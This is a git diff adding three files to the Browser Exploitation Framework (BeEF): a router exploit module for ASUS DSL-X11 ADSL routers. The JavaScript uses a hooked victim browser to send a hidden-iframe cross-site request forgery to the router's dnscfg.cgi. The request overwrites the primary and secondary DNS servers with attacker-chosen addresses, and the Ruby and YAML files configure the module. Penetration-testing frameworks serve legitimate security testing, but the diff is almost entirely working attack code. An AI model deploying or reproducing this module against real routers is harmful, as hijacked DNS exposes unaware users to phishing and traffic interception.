diff --git a/modules/exploits/router/asus_dslx11_dns_hijack/command.js b/modules/exploits/router/asus_dslx11_dns_hijack/command.js new file mode 100644 index 000000000..b004a660c --- /dev/null +++ b/modules/exploits/router/asus_dslx11_dns_hijack/command.js @@ -0,0 +1,60 @@ +// +// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + // config + var target = 'http://<%= @rhost %>/dnscfg.cgi'; + var dns1 = '<%= @dns1 %>'; + var dns2 = '<%= @dns2 %>'; + var timeout = 15; + + // validate primary DNS server IP address + var parts = dns1.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + } + + // validate secondary DNS server IP address + var parts = dns2.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + } + + // change DNS + var asus_dslx11_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ + {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, + {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, + {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, + {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(asus_dslx11_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/router/asus_dslx11_dns_hijack/config.yaml b/modules/exploits/router/asus_dslx11_dns_hijack/config.yaml new file mode 100644 index 000000000..c8c900bd9 --- /dev/null +++ b/modules/exploits/router/asus_dslx11_dns_hijack/config.yaml @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# References: +# https://www.exploit-db.com/exploits/40373/ +# +beef: + module: + asus_dslx11_dns_hijack: + enable: true + category: ["Exploits", "Router"] + name: "ASUS DSL-X11 ADSL Router DNS Hijack" + description: "Attempts to change the DNS setting on a ASUS DSL-X11 ADSL router.

This router reportedly does not require authentication to change the DNS servers.

This module has not been tested." + authors: ["Todor Donev"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/router/asus_dslx11_dns_hijack/module.rb b/modules/exploits/router/asus_dslx11_dns_hijack/module.rb new file mode 100644 index 000000000..6aa4cbac3 --- /dev/null +++ b/modules/exploits/router/asus_dslx11_dns_hijack/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Asus_dslx11_dns_hijack < BeEF::Core::Command + + def self.options + return [ + {'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'}, + {'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'}, + {'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end